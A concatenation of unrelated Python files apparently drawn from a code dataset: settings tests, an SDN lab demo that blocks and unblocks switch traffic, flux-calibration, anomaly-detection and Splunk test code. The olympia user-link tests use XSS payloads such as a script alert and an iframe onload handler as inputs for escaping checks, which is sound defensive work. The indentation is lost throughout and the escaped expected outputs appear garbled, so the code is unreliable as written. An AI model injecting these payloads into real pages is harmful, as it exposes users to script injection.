self.modules.inactivemod.enabled = False
#######################################################################
# ROUTING
#######################################################################
# default routes
self.routing.routes = [1, 2]
# route prefix
self.routing.prefix = ''
#######################################################################
# DATABASE
#######################################################################
self.db.echo = False
#######################################################################
# SESSIONS
#######################################################################
# beaker session options
# http://wiki.pylonshq.com/display/beaker/Configuration+Options
self.beaker.type = 'dbm'
self.beaker.data_dir = 'session_cache'
#######################################################################
# TEMPLATE & VIEW
#######################################################################
self.template.default = 'default.html'
self.template.admin = 'admin.html'
self.trap_view_exceptions = True
#######################################################################
# LOGGING & DEBUG
#######################################################################
# currently support 'debug' & 'info'
self.logging.levels = ()
# no more values can be added
self.lock()
class Default(Base):
def __init__(self):
Base.__init__(self)
# supporting applications
self.supporting_apps = ['rcsappbase']
# application modules from our application or supporting applications
self.unlock()
self.modules.contentbase.enabled = True
self.modules.lagcontent.enabled = True
self.lock()
#######################################################################
# ROUTING
#######################################################################
self.routing.routes.extend([3, 4])
#######################################################################
# DATABASE
#######################################################################
self.db.echo = True
#######################################################################
# LOGGING & DEBUG
#######################################################################
self.logging.levels = ('info', 'debug')
self.trap_view_exceptions = False
self.hide_exceptions = False
class UserSettings(QuickSettings):
def __init__(self):
QuickSettings.__init__(self)
self.routes = ([
'/test1',
'/test2',
])
self.var1 = 'foo'
self.var2 = 'bar'
self.level2.var1 = 'foo'
self.level2.var2 = 'bar'
self.level3.var1 = 'foo'
self.level3.var2 = 'bar'
self.level4.var1 = 'foo'
self.level4.var2 = 'bar'
self.level5.level1.var1 = 'foo'
self.level5.level2.var1 = 'bar'
self.level5.level2.var2 = 'baz'
self.level5.level3.var1 = 'bob'
# no more values can be added
self.lock()
class TestQuickSettings(unittest.TestCase):
def test_level1(self):
es = QuickSettings()
es.a = 1
assert es.a == 1
def test_level2(self):
es = QuickSettings()
es.a.a = 1
assert es.a.a == 1
def test_email(self):
es = QuickSettings()
es.email.smtp.server = 'example.com'
es.email.smtp.user_name = 'myself'
es.email.smtp.password = 'pass'
assert es.email.smtp.server == 'example.com'
assert es.email.smtp.user_name == 'myself'
assert es.email.smtp.password == 'pass'
def test_settings(self):
s = Default()
assert s.name.full == 'full'
assert s.name.short == 'short'
assert s.modules.keys() == ['users', 'apputil', 'contentbase', 'lagcontent']
assert s.routing.routes == [1, 2, 3, 4]
assert s.db.echo is True
assert s.logging.levels == ('info', 'debug')
assert s.trap_view_exceptions is False
assert s.hide_exceptions is False
assert s.template.default == 'default.html'
assert s.template.admin == 'admin.html'
assert s.beaker.type == 'dbm'
assert s.beaker.data_dir == 'session_cache'
def test_lock(self):
s = Default()
try:
s.not_there
except AttributeError as e:
assert str(e) == "object has no attribute 'not_there' (object is locked)"
else:
self.fail("lock did not work, expected AttributeError")
# make sure lock went to children
try:
s.db.not_there
except AttributeError as e:
assert str(e) == "object has no attribute 'not_there' (object is locked)"
else:
self.fail("lock did not work on child, expected AttributeError")
def test_unlock(self):
s = Default()
s.unlock()
s.new_attr = 'new_attr'
s.db.new_attr = 'new_attr'
assert s.db.new_attr == 'new_attr'
assert s.new_attr == 'new_attr'
s.lock()
try:
s.not_there
except AttributeError as e:
assert str(e) == "object has no attribute 'not_there' (object is locked)"
else:
self.fail("lock did not work, expected AttributeError")
# make sure lock went to children
try:
s.db.not_there
except AttributeError as e:
assert str(e) == "object has no attribute 'not_there' (object is locked)"
else:
self.fail("lock did not work on child, expected AttributeError")
def test_dict_convert(self):
s = Default()
# beaker would need a dictionary, so lets see if it works
d = {
'type': 'dbm',
'data_dir': 'session_cache'
}
assert dict(s.beaker) == d
assert s.beaker.todict() == d
def test_hasattr(self):
s = Default()
assert hasattr(s, 'alajsdf') is False
assert hasattr(s, 'alajsdf') is False
s.unlock()
assert hasattr(s, 'alajsdf') is True
def test_modules(self):
s = Default()
s.unlock()
try:
s.modules.badmod = False
except TypeError:
pass
else:
self.fail('expected TypeError when non QuickSettings object assigned to '
'EnabledSettings object')
s.modules.fatfingeredmod.enabledd = True
s.lock()
mods = ['users', 'apputil', 'contentbase', 'lagcontent']
allmods = ['users', 'apputil', 'inactivemod', 'contentbase', 'lagcontent',
'fatfingeredmod']
self.assertEqual(mods, s.modules.keys())
self.assertEqual(allmods, s.modules.keys(showinactive=True))
self.assertEqual(len(mods), len([v for v in s.modules]))
self.assertEqual(len(mods), len(s.modules))
self.assertEqual(len(mods), len(s.modules.values()))
self.assertEqual(len(allmods), len(s.modules.values(showinactive=True)))
self.assertEqual(len(mods), len(s.modules.todict()))
self.assertEqual(len(allmods), len(s.modules.todict(showinactive=True)))
self.assertTrue('users' in s.modules)
self.assertFalse('inactivemod' in s.modules)
def test_merge(self):
s = Default()
us = UserSettings()
try:
self.assertEqual(s.modules.users.var1, 'foo')
except AttributeError as e:
assert str(e) == "object has no attribute 'var1' (object is locked)"
else:
self.fail("expected AttributeError for 'var1'")
self.assertEqual(s.modules.users.var2, 'not bar')
self.assertEqual(us.var2, 'bar')
self.assertEqual(len(us.routes), 2)
self.assertEqual(us.level2.var1, 'foo')
self.assertEqual(us.level2.var2, 'bar')
self.assertEqual(us.level3.var2, 'bar')
self.assertEqual(us.level4.var2, 'bar')
self.assertEqual(us.level5.level1.var1, 'foo')
self.assertEqual(us.level5.level2.var1, 'bar')
self.assertEqual(us.level5.level2.var2, 'baz')
self.assertEqual(us.level5.level3.var1, 'bob')
us.update(s.modules.users)
s.modules['users'] = us
self.assertEqual(s.modules.users.var2, 'not bar')
self.assertEqual(s.modules.users.var1, 'foo')
self.assertEqual(len(s.modules.users.routes), 0)
self.assertEqual(s.modules.users.level2.var1, 'foo')
self.assertEqual(s.modules.users.level2.var2, 'not bar')
self.assertEqual(s.modules.users.level3, 'string value to merge')
self.assertEqual(s.modules.users.level4.var1, 'foo')
self.assertEqual(s.modules.users.level4.var2, 'not bar')
self.assertEqual(s.modules.users.level4.var3, 'baz')
self.assertEqual(s.modules.users.level5.level1.var1.notlikely, 'foo')
self.assertEqual(s.modules.users.level5.level2.var1, 'not_bar')
self.assertEqual(s.modules.users.level5.level2.var2, 'baz')
self.assertEqual(s.modules.users.enabled, True)
class TestConfig(unittest.TestCase):
def setUp(self):
self.app = make_wsgi('Testruns')
def test_appslist(self):
self.assertEqual(['blazewebtestapp', 'blazewebtestapp2'], listapps())
self.assertEqual(['blazewebtestapp2', 'blazewebtestapp'], listapps(reverse=True))
def test_settings(self):
self.assertEqual(settings.foo, 'bar')
def test_modsettings(self):
self.assertEqual(settings.components.tests.foo, 'baz')
def test_settingslock(self):
""" tests the lock() in appinit() """
try:
settings.notthere
except AttributeError as e:
assert str(e) == "object has no attribute 'notthere' (object is locked)"
else:
self.fail("expected AttributeError for 'notthere'")
def test_modulesettingslock(self):
""" tests the lock() in appinit() for module settings """
try:
settings.components.tests.notthere
except AttributeError as e:
assert str(e) == "object has no attribute 'notthere' (object is locked)"
else:
self.fail("expected AttributeError for 'notthere'")
class TestDefaultSettings(object):
@classmethod
def setup_class(cls):
make_wsgi_min2('TestStorageDir')
def test_storage_dir(self):
# assume we are in a virtualenv
assert settings.dirs.storage.endswith('storage-minimal2')
class TestComponentSettings(object):
@classmethod
def setup_class(cls):
make_wsgi_min2('Dispatching')
def test_components(self):
pm = settings.componentmap.minimal2
assert pm.internalonly.enabled is True
assert pm.internalonly.packages == [None]
assert pm.news.enabled is True
assert pm.news.packages == [None, 'newscomp4']
assert pm.foo.enabled is True
assert pm.foo.packages == ['foobwp']
assert settings.component_packages.newscomp4 == 'news'
assert settings.component_packages.foobwp == 'foo'
eq_(settings.component_packages.todict().keys(), ['newscomp4', 'foobwp'])
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
DESCRIPTION:
This is an extremely simple Python application that demonstrates how to use Elbrys SDN Developer Lab (dev.elbrys.com) to
control endpoint user sessions access to the network.
This application will connect to one of the switches that you have connected in the SDN Developer Lab (sdn-developer.elbrys.com)
and demonstrate blocking and unblocking of network traffic for any device connected to the switch.
PRE-REQUISITES:
1. Python 2.x
2. Install python-requests:
a. sudo easy_install requests
3. Go to dev.elbrys.com and follow the directions there
Mail bug reports and suggestion to : support@elbrys.com
"""
import sys, os, errno
import requests
import json
import time
import argparse
from requests.auth import HTTPBasicAuth
def GetAuthToken(user, password, parser):
global odlsBaseUrl
# This calls the api to create an authorization token to make other calls
# RETURNS: authorization token
url = odlsBaseUrl + '/auth/token'
headers = {'content-type': 'application/json'}
user = "name="+user
appId = requests.get(url, headers=headers, auth=HTTPBasicAuth(user,password))
result = appId.text
status = appId.status_code
if ((status >= 200) & (status <=299)):
authToken = appId.json()
authToken = authToken['token']
else:
print " "
print "!! Error !!"
print " Unable to create authorization token. Double check that the username and password you entered."
print " See usage below:"
parser.print_help()
sys.exit()
return authToken;
def GetApps(authToken):
global odlsBaseUrl
url = odlsBaseUrl + '/applications'
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
r = requests.get(url, headers=headers)
if ((r.status_code < 200) | (r.status_code > 299)):
print "Error getting applications list: " + r.text
sys.exit()
else:
return r
def GetAppInfo(authToken, appId):
global odlsBaseUrl
url = odlsBaseUrl + '/applications/' + appId
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
r = requests.get(url, headers=headers)
if ((r.status_code < 200) | (r.status_code > 299)):
print "Error getting application info: " + r.text
sys.exit()
else:
return r
def RemoveZombieApps(authToken, switch):
# Removes any old applications currently connected to the target switch. Only
# one application may be connected to a switch.
apps = GetApps(authToken)
for a in apps.json():
appInfo = GetAppInfo(authToken, a['id'])
appInfo = appInfo.json()
appScope = appInfo['scope']
appVnets = appScope['vnets']
for v in appVnets:
if (v == switch):
print "Deleting a zombie application: " + a['id'] + ", " + a['name']
DeleteApp(authToken,a['id'])
break
def CreateApp(authToken, switch, parser):
global odlsBaseUrl
# This calls the api to create an application
# RETURNS: app identifier
RemoveZombieApps(authToken, switch)
url = odlsBaseUrl + '/applications'
payload = {'name': 'FirstSdnApp/App1 - Example OpenNAC App for switch: ' + switch,
'scope': {'vnets':[switch]}}
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
appId = requests.post(url, data=json.dumps(payload), headers=headers)
result = appId.text
status = appId.status_code
if ((status >= 200) & (status <=299)):
appId = appId.json()
appId = appId['id']
else:
print " "
print "!! Error !!"
print " Unable to create application. Double check your switch identifier."
print " See usage below:"
parser.print_help()
sys.exit()
return appId;
def CreateUnblockPolicy(authToken, appId):
global odlsBaseUrl
# This calls the api to create an authenticated
# policy for the application.
# This is the policy that a new endpoint will
# be given.
# This policy will:
# - allow any packet to pass
# RETURNS: app identifier
# Now create authenticated policy using network resource
url = odlsBaseUrl + '/applications/' + appId + '/policies'
payload = {
'name': 'unblocked',
'default': True,
'rules': [
{
'actions': [
{'type': 'pass'}
]
}
]
}
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
r = requests.post(url, data=json.dumps(payload), headers=headers)
# print "here 5" + r.status_code
status = r.status_code
if ((status >= 200) & (status <=299)):
policyId = r.json()
policyId = policyId['id']
else:
print " "
print "!! Error !!"
print " Unable to create unblock policy."
sys.exit()
return policyId;
def DeleteApp(authToken, appId):
global odlsBaseUrl
# This calls the api to delete an application
# RETURNS: app identifier
url = odlsBaseUrl + '/applications/' + appId
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
r = requests.delete(url, headers=headers)
def GetCommandLineParser():
# This method will process the command line parameters
parser = argparse.ArgumentParser(description='Simple SDN Application to block/unblock devices connected to switch.')
parser.add_argument('--id',required=True,
help='your Application id. Go to sdn-developer.elbrys.com, logon, SDN Applications table for SDN App ID.')
parser.add_argument('--secret',required=True,
help='your Application secret. Go to sdn-developer.elbrys.com, logon, look at SDN Applications table for SDN App Secret and select the "eyeball" icon.')
parser.add_argument('--switch',required=True,
help='the Datapath Id (DPID) for the switch connected without ":" e.g. ccfa00b07b95 Go to sdn-developer.elbrys.com, logon, look in "Devices" table')
parser.add_argument('--server',required=True,
help='The IP address of controller. Go to sdn-developer.elbrys.com, logon, look at "Controller" table for IP Address.')
parser.add_argument('--port',required=True,
help='The TCP port number for REST API . Go to sdn-developer.elbrys.com, logon, look at "Controller" table for REST API Port.')
return parser
def main():
global odlsBaseUrl
# The version of the application
# 1.0 - initial version
# 1.1 - added code to remove apps for selected vnet before creating new app
version="1.1"
print "App1 (FirstSdnApp)"
print "Version: " + version
print "A very simple 'hello world' application that uses SDN Developer Lab."
print __doc__
# --------------------------------
# Command Line Processing
parser=GetCommandLineParser()
args = parser.parse_args()
odlsBaseUrl = "http://"+args.server+":"+args.port+"/ape/v1"
print "REST API is at: " + odlsBaseUrl
# --------------------------------
# Main application
print " "
print "Obtaining authorization token..."
authToken = GetAuthToken(args.id,args.secret,parser)
if (authToken):
print "...authorization token obtained:" + authToken
print " "
print 'Creating application...'
appId = CreateApp(authToken, args.switch,parser)
if (appId):
try:
print "...application created with id:" + appId
print " "
print "Now that an application is connected to your "
print " switch any traffic to/from connected user devices will be blocked until a policy is defined."
print " Also, you can go to sdn-developer.elbrys.com and refresh the screen "
print " you will see this application listed in the applications table."
print " "
print "Connect a user device (laptop, tablet, phone) to a port on your network device."
print " "
raw_input("Press Enter when you have connected a user device.")
print " "
print "From your user device prove to yourself you do NOT have connectivity. Ping something."
print " "
raw_input("Press Enter when you have proven your user device is blocked.")
print " "
print "Creating unblock policy as default for any device detected..."
unblockPolicyId = CreateUnblockPolicy(authToken, appId)
print "...unblock policy created with id:" + unblockPolicyId
print " "
print "From your user device prove to yourself you now DO have connectivity. Try to ping something."
print " "
raw_input("Press Enter to end this application.")
except Exception as inst:
print " Exception detected..."
print type(inst) # the exception instance
print inst.args # arguments stored in .args
print inst # __str__ allows args to be printed directly
finally:
print "Deleting application..."
DeleteApp(authToken, appId)
print "...application deleted."
print ""
print "Now that the application is deleted you will continue to have connectivity."
print "If you go to your sdn-developer.elbrys.com and refresh the screen you will "
print " no longer see this application listed."
# The BASE url where the RESTful api listens
odlsBaseUrl = "http://placeholder.for.rest.api.com";
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
"""Unit tests for flux calibration/zeropoints
Authors
-------
- Bryan Hilbert
Use
---
Ensure you have pytest installed. Then, simply run pytest in any
parent directory of mirage/tests/:
>>> pytest
"""
from astropy.table import Table
import numpy as np
import os
import pkg_resources
from mirage.utils import flux_cal
package_path = pkg_resources.resource_filename('mirage', '')
CONFIG_DIR = os.path.join(package_path, 'config')
def test_add_detector_to_zeropoints():
"""Test addition of column to table
"""
detector = 'NRCA1'
tab = Table()
tab['index'] = np.arange(5)
tab['information'] = [1.2, 2.3, 3.4, 4.5, 5.6]
updated_tab = flux_cal.add_detector_to_zeropoints(detector, tab)
assert np.all(updated_tab['Detector'].data == np.array([detector] * 5))
assert np.all(updated_tab['index'].data == tab['index'].data)
assert np.all(updated_tab['information'].data == tab['information'].data)
def test_fluxcal_info():
"""Test that zeropoint information for the exposure is correctly retrieved
"""
params = {'Inst': {"instrument": 'NIRCAM'},
'Readout': {'filter': 'F200W', 'pupil': 'CLEAR'},
'Reffiles': {'flux_cal': os.path.join(CONFIG_DIR, 'NIRCam_zeropoints.list')}
}
detector = 'NRCA1'
module = 'A'
vegazp, photflam, photfnu, pivot = flux_cal.fluxcal_info(params['Reffiles']['flux_cal'], 'NIRCAM',
params['Readout']['filter'],
params['Readout']['pupil'], detector, module)
assert vegazp == 25.53922551081712
assert photflam == 3.494575360570938e-21
assert photfnu == 4.610220127681534e-31
assert pivot == 1.9887215391807087
|
nilq/baby-python
|
python
|
def clean_string(s):
if len(s) == 0:
return s
q = []
for idx in range(len(s)):
if s[idx] != "#":
q.append(s[idx])
elif len(q) != 0:
q.pop()
return "".join(q)
|
nilq/baby-python
|
python
|
import os
high_scores = {
"small_1" : "0",
"small_2" : "0",
"small_3" : "0",
"medium_1" : "0",
"medium_2" : "0",
"medium_3" : "0",
"large_1" : "0",
"large_2" : "0",
"large_3" : "0",
}
|
nilq/baby-python
|
python
|
from typing import List
import torch
from torch.utils.data.dataset import Dataset
def noise(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor,
nom_class: int, train_set: Dataset, gt: bool = False) -> Dataset:
"""
Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
:param outlier_classes: a list of all outlier class indices.
:param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
:param norm: torch tensor of nominal images (n x c x h x w).
:param nom_class: the index of the class that is considered nominal.
:param train_set: some training dataset.
:param gt: whether to provide ground-truth maps as well, atm not available!
:return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
"""
if gt:
raise ValueError('No GT mode for pure noise available!')
anom = generated_noise.clamp(0, 255).byte()
data = torch.cat((norm, anom))
targets = torch.cat(
(torch.ones(norm.size(0)) * nom_class,
torch.ones(anom.size(0)) * outlier_classes[0])
)
train_set.data = data
train_set.targets = targets
return train_set
def malformed_normal(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor, nom_class: int,
train_set: Dataset, gt: bool = False, brightness_threshold: float = 0.11*255) -> Dataset:
"""
Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
Unlike above, the noise images are not directly utilized as anomalies, but added to nominal samples to
create malformed normal anomalies.
:param outlier_classes: a list of all outlier class indices.
:param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
:param norm: torch tensor of nominal images (n x c x h x w).
:param nom_class: the index of the class that is considered nominal.
:param train_set: some training dataset.
:param gt: whether to provide ground-truth maps as well.
:param brightness_threshold: if the average brightness (averaged over color channels) of a pixel exceeds this
threshold, the noise image's pixel value is subtracted instead of added.
This avoids adding brightness values to bright pixels, where approximately no effect is achieved at all.
:return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
"""
assert (norm.dim() == 4 or norm.dim() == 3) and generated_noise.shape == norm.shape
norm_dim = norm.dim()
if norm_dim == 3:
norm, generated_noise = norm.unsqueeze(1), generated_noise.unsqueeze(1) # assuming ch dim is skipped
anom = norm.clone()
# invert noise for bright regions (bright regions are considered being on average > brightness_threshold)
generated_noise = generated_noise.int()
bright_regions = norm.sum(1) > brightness_threshold * norm.shape[1]
for ch in range(norm.shape[1]):
gnch = generated_noise[:, ch]
gnch[bright_regions] = gnch[bright_regions] * -1
generated_noise[:, ch] = gnch
anom = (anom.int() + generated_noise).clamp(0, 255).byte()
data = torch.cat((norm, anom))
targets = torch.cat(
(torch.ones(norm.size(0)) * nom_class,
torch.ones(anom.size(0)) * outlier_classes[0])
)
if norm_dim == 3:
data = data.squeeze(1)
train_set.data = data
train_set.targets = targets
if gt:
gtmaps = torch.cat(
(torch.zeros_like(norm)[:, 0].float(), # 0 for nominal
(norm != anom).max(1)[0].clone().float()) # 1 for anomalous
)
if norm_dim == 4:
gtmaps = gtmaps.unsqueeze(1)
return train_set, gtmaps
else:
return train_set
|
nilq/baby-python
|
python
|
import logging
import logging.handlers
import os
def create_logger(name):
"""Create generic logger for all nodes"""
# Create logger and let it capture all messages
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# Output formatting
formatter = logging.Formatter("[ %(asctime)s : %(name)s : %(levelname)s ] %(message)s")
# Create rotating file handler to backup multiple runs
filename = f"Logging/{name}"
if not os.path.exists(filename):
os.mkdir(filename)
filename = filename + "/output.log"
roll_over = os.path.isfile(filename)
file_handler = logging.handlers.RotatingFileHandler(filename, mode='a', backupCount=5)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
if roll_over:
file_handler.doRollover()
# Create stream handler to print to stdout
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
# Add handlers to logger
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
logger.info("--------Session start--------")
return logger
def myput(queue, obj):
try:
queue.put_nowait(obj)
except Exception as e:
pass
|
nilq/baby-python
|
python
|
from __future__ import absolute_import, division, print_function
import os
import numpy as np
import pytest
from ciso import zslice
data_path = os.path.join(os.path.dirname(__file__), "data")
@pytest.fixture
def data():
p = np.linspace(-100, 0, 30)[:, None, None] * np.ones((50, 70))
x, y = np.mgrid[0:20:50j, 0:20:70j]
q = np.sin(x) + p
yield {"q": q, "p": p, "x": x, "y": y}
@pytest.fixture
def expected_results():
yield np.load(os.path.join(data_path, "fortran.npz"))["s50"]
def test_mismatch_shapes(data):
with pytest.raises(ValueError):
zslice(data["q"], data["p"][0], p0=0)
def test_p0_wrong_shape(data):
with pytest.raises(ValueError):
zslice(data["q"], data["p"], p0=np.zeros((2, 2)))
def test_bad_dtypes(data):
# FIXME: Boolean array are converted to float! Only str fails correctly.
with pytest.raises(ValueError):
zslice(np.empty_like(data["q"], dtype=np.str_), data["p"], p0=0)
def test_good_dtypes(data):
# FIXME: Using `np.asfarray` will prevent from using complex dtypes.
# NOTE: There is probably a more "numpy" efficient way to test this.
dtypes = [
int,
float,
np.integer,
np.float16,
np.float32,
np.float64,
np.float128,
np.floating,
]
for dtype in dtypes:
zslice(np.empty_like(data["q"], dtype=dtype), data["p"], p0=0)
def test_3D_input(data):
K, I, J = data["q"].shape
s50 = zslice(data["q"], data["p"], p0=-50)
assert s50.shape == (I, J)
def test_2D_input(data):
K, I, J = data["q"].shape
s50 = zslice(data["q"].reshape(K, -1), data["p"].reshape(K, -1), p0=-50)
assert s50.shape == (I * J,)
def test_1D_input(data):
with pytest.raises(ValueError):
zslice(data["q"].ravel(), data["p"].ravel(), p0=0)
def test_gt_3D_input(data):
with pytest.raises(ValueError):
zslice(data["q"][np.newaxis, ...], data["p"][np.newaxis, ...], p0=0)
def test_corret_results_3D(data, expected_results):
s50 = zslice(data["q"], data["p"], p0=-50)
np.testing.assert_almost_equal(s50, expected_results)
def test_corret_results_2D(data, expected_results):
K, I, J = data["q"].shape
s50 = zslice(data["q"].reshape(K, -1), data["p"].reshape(K, -1), p0=-50)
np.testing.assert_almost_equal(s50, expected_results.ravel())
def test_p0_outside_bounds(data):
with pytest.raises(ValueError):
K, I, J = data["q"].shape
zslice(data["q"], data["p"], p0=50)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import pytest
from olympia.users.models import UserProfile
from olympia.users.templatetags.jinja_helpers import user_link, users_list
pytestmark = pytest.mark.django_db
def test_user_link():
u = UserProfile(username='jconnor', display_name='John Connor', pk=1)
assert user_link(u) == (
'<a href="%s" title="%s">John Connor</a>' % (u.get_url_path(),
u.name))
# handle None gracefully
assert user_link(None) == ''
def test_user_link_xss():
u = UserProfile(username='jconnor',
display_name='<script>alert(1)</script>', pk=1)
html = "<script>alert(1)</script>"
assert user_link(u) == '<a href="%s" title="%s">%s</a>' % (
u.get_url_path(), html, html)
u = UserProfile(username='jconnor',
display_name="""xss"'><iframe onload=alert(3)>""", pk=1)
html = """xss"'><iframe onload=alert(3)>"""
assert user_link(u) == '<a href="%s" title="%s">%s</a>' % (
u.get_url_path(), html, html)
def test_users_list():
u1 = UserProfile(username='jconnor', display_name='John Connor', pk=1)
u2 = UserProfile(username='sconnor', display_name='Sarah Connor', pk=2)
assert users_list([u1, u2]) == ', '.join((user_link(u1), user_link(u2)))
# handle None gracefully
assert user_link(None) == ''
def test_short_users_list():
"""Test the option to shortened the users list to a certain size."""
# short list with 'others'
u1 = UserProfile(username='oscar', display_name='Oscar the Grouch', pk=1)
u2 = UserProfile(username='grover', display_name='Grover', pk=2)
u3 = UserProfile(username='cookies!', display_name='Cookie Monster', pk=3)
shortlist = users_list([u1, u2, u3], size=2)
assert shortlist == ', '.join((user_link(u1), user_link(u2))) + ', others'
def test_users_list_truncate_display_name():
u = UserProfile(username='oscar',
display_name='Some Very Long Display Name', pk=1)
truncated_list = users_list([u], None, 10)
assert truncated_list == (
u'<a href="%s" title="%s">Some Very...</a>' % (u.get_url_path(),
u.name))
def test_user_link_unicode():
"""make sure helper won't choke on unicode input"""
u = UserProfile.objects.create(
username=u'jmüller', display_name=u'Jürgen Müller')
assert user_link(u) == (
u'<a href="%s" title="%s">Jürgen Müller</a>' % (
u.get_url_path(), u.name))
u = UserProfile.objects.create(display_name=u'\xe5\xaf\x92\xe6\x98\x9f')
assert user_link(u) == (
u'<a href="%s" title="%s">%s</a>' % (u.get_url_path(), u.name,
u.display_name))
|
nilq/baby-python
|
python
|
from __future__ import division
import os
import pickle
import numpy as np
import blt_net.cascademv2.utils.benchmark_utils as benchmark_utils
import ntpath
import cv2
from blt_net.cascademv2.utils.general_utils import create_logger
import sys
import tensorflow as tf
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = '0' # set to 0 when only 1 GPU is available and 1 when 2 GPUs are available
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
def evaluate_model(cascademv2_config, model_path, model_name):
eval_cascademv2_config = cascademv2_config.clone()
model_path = eval_cascademv2_config.model_name
if not os.path.isfile(model_path):
print('Model {} does not exist. Skipping...'.format(model_path))
return
eval_cascademv2_config.img_input = eval_cascademv2_config.eval_im_input
out_path = os.path.join(eval_cascademv2_config.eval_output_root, 'raw_inference')
if not os.path.exists(out_path):
os.makedirs(out_path, exist_ok=True)
eval_cascademv2_config.out_path = out_path
os.makedirs(out_path, exist_ok=True)
logger = create_logger(eval_cascademv2_config.out_path, show_in_stdout=False)
print('Evaluating model {}'.format(model_path))
# ---------------------------------------------------------
with open(eval_cascademv2_config.eval_filename, 'rb') as fid:
val_data = pickle.load(fid)
# ---------------------------------------------------------
if cascademv2_config.steps == 2:
from blt_net.cascademv2.core.modes.model_2step import Model_2step
model = Model_2step()
else:
raise NotImplementedError('Not implement {} or more steps'.format(cascademv2_config.steps))
model.initialize(eval_cascademv2_config, logger)
model.creat_model(eval_cascademv2_config, phase='inference')
model.load_model(model_path)
eval_model_on_dataset(model, eval_cascademv2_config, val_data)
benchmark_utils.convert_results(out_path, eval_cascademv2_config.eval_dataset_type)
def eval_model_on_dataset(model, cascademv2_config, val_data):
filenames = []
for f_index in range(len(val_data)):
filenames.append(val_data[f_index]['filepath'])
ind = np.argsort(filenames)
for f_index in range(len(ind)):
# for f_index in range(0,10):
f_ind = ind[f_index]
filepath = val_data[f_ind]['filepath']
gt_arr = []
if 'bboxes' in val_data[f_ind].keys():
gt_arr = val_data[f_ind]['bboxes']
head, file_name = ntpath.split(filepath)
file_name = os.path.splitext(file_name)
file_name = file_name[0]
res_txt_filename = os.path.join(model.out_path, file_name + '.txt')
res_img_filename = ''
if cascademv2_config.create_image:
res_img_filename = os.path.join(model.out_path, file_name + '.png')
img = cv2.imread(filepath)
model.test_model(cascademv2_config, img, gt_arr=gt_arr, res_txt_filename=res_txt_filename, res_img_filename=res_img_filename)
def main(argv):
import argparse
from blt_net.cascademv2.config_cascademv2 import get_cfg_defaults
cascademv2_config = get_cfg_defaults()
parser = argparse.ArgumentParser(description='eval config.')
parser.add_argument('--cfg_path',
type=str,
required=False,
help='Path to YAML config file.')
args = parser.parse_args()
if args.cfg_path is None:
cascademv2_config.merge_from_file("./trainconfigs/citypersons_config.yaml")
else:
cascademv2_config.merge_from_file(args.cfg_path)
evaluate_model(cascademv2_config, cascademv2_config.out_path, cascademv2_config.model_name)
if __name__ == '__main__':
main(sys.argv[1:])
|
nilq/baby-python
|
python
|
'''
Extra operators used by MetaFunctions
'''
from operator import add, sub, truediv, mul
def concat(*args):
"concat(1, 2, 3) -> (1, 2, 3)"
return args
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.2 on 2019-09-27 00:54
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("dcodex", "0003_auto_20190920_1333"),
]
operations = [
migrations.AlterModelOptions(
name="manuscript",
options={"ordering": ["siglum", "name"]},
),
]
|
nilq/baby-python
|
python
|
import pytest
# stdlib
import json
import os
import unittest
from stackstate_checks.base.errors import CheckException
from stackstate_checks.splunk.client import TokenExpiredException
from stackstate_checks.splunk_health.splunk_health import SplunkHealth, Instance
from stackstate_checks.base.stubs import health, aggregator
from stackstate_checks.base import TopologyInstance
# Mark the entire module as tests of type `unit`
pytestmark = pytest.mark.unit
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'ci', 'fixtures')
def load_fixture(fixture_file):
with open(os.path.join(FIXTURE_DIR, fixture_file)) as f:
return json.loads(f.read())
class MockSplunkClient(object):
def __init__(self):
self._dispatch_parameters = None
self.invalid_token = False
def auth_session(self, committable_state):
if self.invalid_token:
raise TokenExpiredException("Current in use authentication token is expired. Please provide a valid "
"token in the YAML and restart the Agent")
return
def saved_searches(self):
return []
def saved_search_results(self, search_id, saved_search):
if search_id == "exception":
raise CheckException("maximum retries reached for saved search " + str(search_id))
# sid is set to saved search name
return [load_fixture("%s.json" % search_id)]
def dispatch(self, saved_search, splunk_app, ignore_saved_search_errors, parameters):
if saved_search.name == "dispatch_exception":
raise Exception("BOOM")
self._dispatch_parameters = parameters
return saved_search.name
def finalize_sid(self, search_id, saved_search):
return
class MockedInstance(Instance):
def __init__(self, *args, **kwargs):
super(MockedInstance, self).__init__(*args, **kwargs)
def _build_splunk_client(self):
return MockSplunkClient()
class MockedSplunkHealth(SplunkHealth):
def __init__(self, *args, **kwargs):
super(MockedSplunkHealth, self).__init__(*args, **kwargs)
def _build_instance(self, instance):
return MockedInstance(instance, self.init_config)
class TestSplunkCheck(unittest.TestCase):
CHECK_NAME = "splunk"
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [],
'collection_interval': 15
}
instance_key = TopologyInstance("splunk", "http://localhost:8089")
def setUp(self):
"""
Initialize and patch the check, i.e.
"""
